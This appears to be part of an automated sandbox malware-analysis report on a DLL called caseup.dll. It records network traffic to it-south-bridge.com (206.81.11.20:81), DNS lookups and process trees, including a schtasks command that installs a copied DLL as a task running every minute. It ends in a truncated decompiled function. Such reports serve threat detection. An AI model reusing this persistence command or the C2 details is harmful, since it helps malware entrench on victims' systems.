Nov 10, 2022 11:43:50.163566113 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.163614988 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.169527054 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.265124083 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.265172958 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.265197992 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.265222073 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.265244961 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.265248060 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.265269041 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.265281916 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.265294075 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.265316963 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.265326023 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.265341043 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.265366077 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.265374899 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.265393972 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.265417099 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.265439034 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.265460968 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.265463114 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.265472889 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.265486002 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.265510082 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.265517950 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.265532970 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.265542984 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.265556097 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.265579939 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.265588045 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.265737057 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.271267891 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367245913 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367284060 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367309093 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367309093 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.367333889 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367342949 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.367361069 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367387056 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367404938 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.367412090 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367435932 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367450953 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.367459059 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367485046 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367494106 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.367506981 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367531061 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367539883 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.367553949 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367578030 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367587090 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.367600918 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367620945 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367644072 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367647886 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.367666960 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367686987 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.367691040 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367714882 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367724895 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.367738962 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367762089 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367772102 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.367784977 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367809057 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367820024 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.367834091 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367857933 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367875099 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.367881060 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367901087 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.367907047 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367930889 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367944956 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.367953062 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367976904 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.367989063 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.368129969 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.470079899 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470139027 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470166922 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470194101 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470221043 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470247984 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470251083 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.470251083 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.470272064 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470280886 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.470298052 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470323086 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470331907 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.470347881 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470371962 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470381975 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.470397949 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470422029 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470432997 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.470448017 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470474005 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470482111 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.470510006 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470534086 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470542908 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.470558882 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470582962 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470592976 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.470607996 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470632076 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470643997 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.470657110 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470680952 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470705986 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470707893 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.470731020 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470741034 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.470757961 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470782042 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470793009 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.470807076 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470829964 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470839977 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.470854998 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470890999 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.470897913 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470922947 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470946074 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470954895 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.470969915 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.470993996 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.471015930 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.471020937 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.471045017 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.471055031 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.471069098 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.471091032 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.471101046 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.471116066 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.471138954 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.471148014 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.471163034 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.471185923 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.471194983 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.471210957 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.471237898 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.471245050 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.471266031 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.471292973 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.471306086 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.471318007 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.471335888 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.471343994 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.471365929 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.471378088 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.473782063 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.474026918 CET	49174	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:50.572953939 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.573045969 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.573072910 CET	81	49174	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:50.573097944 CET	81	49174	206.81.11.20	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 10, 2022 11:43:10.333885908 CET	192.168.2.22	8.8.8.8	0xff97	Standard query (0)	it-south-bridge.com	A (IP address)	IN (0x0001)	false
Nov 10, 2022 11:43:10.394357920 CET	192.168.2.22	8.8.8.8	0xcbc1	Standard query (0)	it-south-bridge.com	A (IP address)	IN (0x0001)	false
Nov 10, 2022 11:43:13.197523117 CET	192.168.2.22	8.8.8.8	0xe9fc	Standard query (0)	it-south-bridge.com	A (IP address)	IN (0x0001)	false
Nov 10, 2022 11:43:49.728364944 CET	192.168.2.22	8.8.8.8	0x7326	Standard query (0)	it-south-bridge.com	A (IP address)	IN (0x0001)	false
Nov 10, 2022 11:44:17.640532017 CET	192.168.2.22	8.8.8.8	0x3f68	Standard query (0)	it-south-bridge.com	A (IP address)	IN (0x0001)	false
Nov 10, 2022 11:44:23.366039991 CET	192.168.2.22	8.8.8.8	0x7d60	Standard query (0)	it-south-bridge.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 10, 2022 11:43:10.645797014 CET	8.8.8.8	192.168.2.22	0xff97	No error (0)	it-south-bridge.com	206.81.11.20	A (IP address)	IN (0x0001)	false
Nov 10, 2022 11:43:10.706741095 CET	8.8.8.8	192.168.2.22	0xcbc1	No error (0)	it-south-bridge.com	206.81.11.20	A (IP address)	IN (0x0001)	false
Nov 10, 2022 11:43:13.520382881 CET	8.8.8.8	192.168.2.22	0xe9fc	No error (0)	it-south-bridge.com	206.81.11.20	A (IP address)	IN (0x0001)	false
Nov 10, 2022 11:43:49.748065948 CET	8.8.8.8	192.168.2.22	0x7326	No error (0)	it-south-bridge.com	206.81.11.20	A (IP address)	IN (0x0001)	false
Nov 10, 2022 11:44:17.953330040 CET	8.8.8.8	192.168.2.22	0x3f68	No error (0)	it-south-bridge.com	206.81.11.20	A (IP address)	IN (0x0001)	false
Nov 10, 2022 11:44:23.385246038 CET	8.8.8.8	192.168.2.22	0x7d60	No error (0)	it-south-bridge.com	206.81.11.20	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

it-south-bridge.com:81

it-south-bridge.com

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll64.exePID: 2080, Parent PID: 1860

General

Target ID:	1
Start time:	11:42:12
Start date:	10/11/2022
Path:	C:\Windows\System32\loaddll64.exe
Wow64 process (32bit):	false
Commandline:	loaddll64.exe "C:\Users\user\Desktop\caseup.dll"
Imagebase:	0x13f210000
File size:	139776 bytes
MD5 hash:	C676FC0263EDD17D4CE7D644B8F3FCD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 2948, Parent PID: 2080

General

Target ID:	3
Start time:	11:42:12
Start date:	10/11/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\caseup.dll",#1
Imagebase:	0x4a2a0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1184, Parent PID: 2080

General

Target ID:	4
Start time:	11:42:12
Start date:	10/11/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\caseup.dll,DllMain
Imagebase:	0xffeb0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 500, Parent PID: 2948

General

Target ID:	5
Start time:	11:42:12
Start date:	10/11/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\Desktop\caseup.dll",#1
Imagebase:	0xffeb0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 772, Parent PID: 500

General

Target ID:	6
Start time:	11:42:18
Start date:	10/11/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain
Imagebase:	0xffeb0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 1288, Parent PID: 500

General

Target ID:	7
Start time:	11:42:19
Start date:	10/11/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f
Imagebase:	0xff230000
File size:	285696 bytes
MD5 hash:	97E0EC3D6D99E8CC2B17EF2D3760E8FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: taskeng.exePID: 1424, Parent PID: 876

General

Target ID:	8
Start time:	11:42:20
Start date:	10/11/2022
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {195B2CF0-9BCC-4145-91B3-37920C07B877} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Imagebase:	0xff790000
File size:	464384 bytes
MD5 hash:	65EA57712340C09B1B0C427B4848AE05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1748, Parent PID: 1424

General

Target ID:	9
Start time:	11:42:20
Start date:	10/11/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain
Imagebase:	0xffeb0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1552, Parent PID: 2080

General

Target ID:	10
Start time:	11:42:21
Start date:	10/11/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain
Imagebase:	0xffeb0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 1688, Parent PID: 2080

General

Target ID:	11
Start time:	11:42:23
Start date:	10/11/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN StdntsUpdate /TR "C:\Windows\system32\rundll32.exe C:\ProgramData\StndUpdate\UimbTD.dll,DllMain" /f
Imagebase:	0xff790000
File size:	285696 bytes
MD5 hash:	97E0EC3D6D99E8CC2B17EF2D3760E8FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: loaddll64.exePID: 2080, Parent PID: 1860COMMON

Executed Functions

Function 000007FEF30452B3 Relevance: 196.3, APIs: 118, Strings: 10, Instructions: 4322
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 25%

			E000007FE7FEF30452B3(void* __esp, signed int __rdx, signed int __r8, signed int __r9, signed int __r10) {
				signed char _t1458;
				void* _t1462;
				void* _t1463;
				void* _t1469;
				void* _t1470;
				signed char _t1477;
				void* _t1479;
				void* _t1480;
				void* _t1482;
				void* _t1483;
				void* _t1485;
				void* _t1487;
				void* _t1489;
				void* _t1491;
				void* _t1493;
				void* _t1495;
				void* _t1496;
				void* _t1497;
				void* _t1498;
				void* _t1499;
				void* _t1500;
				void* _t1501;
				signed int _t1502;
				signed short _t1504;
				signed int _t1507;
				signed int _t1551;
				signed int _t1580;
				void* _t1589;
				void* _t1594;
				void* _t1596;
				signed int _t1713;
				signed int _t1793;
				signed int _t1794;
				signed char _t1829;
				signed int _t1830;
				void* _t2008;
				void* _t2021;
				long long _t2025;
				void* _t2027;
				signed char _t2031;
				void* _t2033;
				signed int _t2037;
				void* _t2039;
				long long _t2043;
				void* _t2045;
				signed int _t2049;
				void* _t2051;
				void* _t2053;
				signed int _t2057;
				void* _t2059;
				signed int _t2063;
				void* _t2065;
				signed int _t2069;
				void* _t2071;
				signed int _t2075;
				void* _t2077;
				signed int _t2081;
				void* _t2083;
				signed int _t2087;
				void* _t2089;
				signed int _t2093;
				void* _t2095;
				signed int _t2099;
				void* _t2101;
				signed int _t2105;
				void* _t2107;
				intOrPtr _t2111;
				intOrPtr _t2117;
				intOrPtr _t2123;
				long long _t2264;
				intOrPtr _t2266;
				signed int* _t2268;
				void* _t2286;
				intOrPtr _t2288;
				signed int* _t2289;
				signed int* _t2294;
				void* _t2299;
				signed int* _t2305;
				void* _t2308;
				void* _t2313;
				signed int* _t2317;
				long long _t2321;
				long long _t2326;
				signed int* _t2333;
				long long _t2336;
				void* _t2342;
				long long _t2347;
				unsigned long long _t2349;
				long long _t2357;
				signed int* _t2363;
				signed long long _t2366;
				signed long long _t2371;
				void* _t2374;
				signed long long _t2376;
				signed long long _t2379;
				signed long long _t2380;
				signed long long _t2382;
				signed long long _t2383;
				signed long long _t2385;
				signed long long _t2387;
				signed long long _t2389;
				signed long long _t2393;
				signed long long _t2394;
				long long _t2437;
				intOrPtr _t2445;
				intOrPtr _t2450;
				intOrPtr _t2457;
				intOrPtr _t2464;
				intOrPtr _t2471;
				intOrPtr _t2478;
				intOrPtr _t2479;
				intOrPtr _t2486;
				intOrPtr _t2493;
				intOrPtr _t2500;
				intOrPtr _t2507;
				intOrPtr _t2514;
				intOrPtr _t2521;
				intOrPtr _t2528;
				intOrPtr _t2535;
				intOrPtr _t2542;
				long long _t2549;
				long long _t2550;
				long long _t2558;
				long long _t2559;
				long long _t2567;
				long long _t2568;
				long long _t2576;
				long long _t2577;
				long long _t2578;
				void* _t2579;
				void* _t2580;
				void* _t2581;
				void* _t2582;
				void* _t2583;
				long long _t2586;
				void* _t2587;
				signed long long _t2593;
				signed long long _t2595;
				signed long long _t2603;
				void* _t2622;
				intOrPtr* _t2624;
				unsigned long long _t2628;
				unsigned long long _t2629;
				void* _t2630;
				void* _t2631;
				void* _t2632;
				void* _t2633;
				void* _t2634;
				void* _t2635;
				void* _t2636;
				void* _t2637;
				void* _t2638;
				void* _t2639;
				void* _t2640;
				void* _t2641;
				void* _t2642;
				void* _t2643;
				void* _t2644;
				void* _t2645;
				void* _t2646;
				signed long long _t2732;
				signed long long _t2734;
				signed long long _t2787;
				unsigned long long _t2792;
				long long _t2809;
				long long _t2816;
				signed char _t2823;
				signed int _t2830;
				signed int _t2842;
				signed int _t2851;
				signed int _t2858;
				signed int _t2865;
				signed int _t2872;
				signed int _t2879;
				signed int _t2886;
				signed int _t2893;
				signed int _t2900;
				signed int _t2907;
				intOrPtr _t2915;
				intOrPtr _t2921;
				intOrPtr _t2928;
				intOrPtr _t2935;
				signed long long _t3050;
				signed long long _t3055;
				long long* _t3087;
				long long* _t3088;
				signed int** _t3089;
				signed long long _t3090;
				signed long long _t3091;
				signed long long* _t3092;
				signed long long* _t3093;
				signed long long _t3096;
				signed long long _t3098;
				signed long long _t3100;
				signed long long _t3102;
				signed long long _t3104;
				signed long long _t3107;
				signed long long _t3108;
				long long* _t3175;
				long long _t3179;
				long long _t3180;
				long long _t3181;
				long long* _t3183;
				long long _t3186;
				long long _t3187;
				long long _t3188;
				long long* _t3190;
				long long _t3193;
				long long _t3194;
				long long _t3195;
				long long* _t3197;
				long long _t3200;
				long long _t3201;
				long long _t3202;
				long long* _t3204;
				long long _t3207;
				long long _t3208;
				long long _t3209;
				long long* _t3211;
				long long _t3214;
				long long _t3215;
				long long _t3216;
				long long _t3218;
				signed long long _t3219;
				long long _t3220;
				long long* _t3222;
				long long _t3225;
				long long _t3226;
				long long _t3227;
				long long* _t3229;
				long long _t3232;
				long long _t3233;
				long long _t3234;
				long long* _t3236;
				long long _t3239;
				long long _t3240;
				long long _t3241;
				long long* _t3243;
				long long _t3246;
				long long _t3247;
				long long _t3248;
				long long* _t3250;
				long long _t3253;
				long long _t3254;
				long long _t3255;
				long long* _t3257;
				long long _t3260;
				long long _t3261;
				long long _t3262;
				long long* _t3264;
				long long _t3267;
				long long _t3268;
				long long _t3269;
				long long* _t3271;
				long long _t3274;
				long long _t3275;
				long long _t3276;
				long long* _t3278;
				long long _t3281;
				long long _t3282;
				long long _t3283;
				long long* _t3285;
				intOrPtr _t3288;
				long long* _t3290;
				intOrPtr _t3293;
				long long* _t3295;
				intOrPtr _t3299;
				long long* _t3301;
				intOrPtr _t3305;
				intOrPtr _t3306;
				signed long long _t3309;
				signed long long _t3311;
				signed long long _t3313;
				signed long long _t3315;
				signed long long _t3317;
				signed long long _t3322;
				signed long long _t3323;
				signed long long _t3325;
				void* _t3342;
				unsigned long long _t3343;
				void* _t3345;
				intOrPtr _t3347;
				intOrPtr _t3349;
				intOrPtr _t3351;
				intOrPtr _t3353;
				intOrPtr _t3355;
				intOrPtr _t3357;
				intOrPtr _t3359;
				intOrPtr _t3361;
				intOrPtr _t3363;
				intOrPtr _t3365;
				intOrPtr _t3367;
				intOrPtr _t3369;
				intOrPtr _t3371;
				intOrPtr _t3373;
				intOrPtr _t3375;
				signed int _t3376;
				signed int _t3378;
				signed long long _t3381;
				signed long long _t3384;
				intOrPtr* _t3387;
				intOrPtr* _t3388;
				intOrPtr* _t3390;
				intOrPtr* _t3393;
				signed long long _t3397;
				unsigned long long _t3405;
				long long _t3412;
				intOrPtr* _t3413;
				long long* _t3415;
				long long* _t3416;
				signed long long _t3418;
				signed long long _t3420;
				signed long long _t3422;
				signed long long _t3424;
				signed long long _t3426;
				signed long long _t3428;
				signed long long _t3430;
				signed long long _t3431;
				intOrPtr* _t3449;
				intOrPtr* _t3453;
				intOrPtr* _t3457;
				intOrPtr* _t3461;
				intOrPtr* _t3465;
				intOrPtr* _t3469;
				intOrPtr* _t3474;
				intOrPtr* _t3478;
				intOrPtr* _t3482;
				intOrPtr* _t3486;
				intOrPtr* _t3490;
				intOrPtr* _t3494;
				intOrPtr* _t3498;
				intOrPtr* _t3502;
				intOrPtr* _t3506;
				intOrPtr* _t3510;
				intOrPtr _t3511;
				intOrPtr* _t3514;
				intOrPtr _t3515;
				intOrPtr* _t3522;
				signed long long _t3530;
				signed int* _t3531;
				signed long long _t3542;
				unsigned long long _t3557;
				signed long long _t3563;
				signed long long _t3565;
				signed long long _t3567;
				signed long long _t3573;
				signed long long _t3574;
				signed long long _t3576;
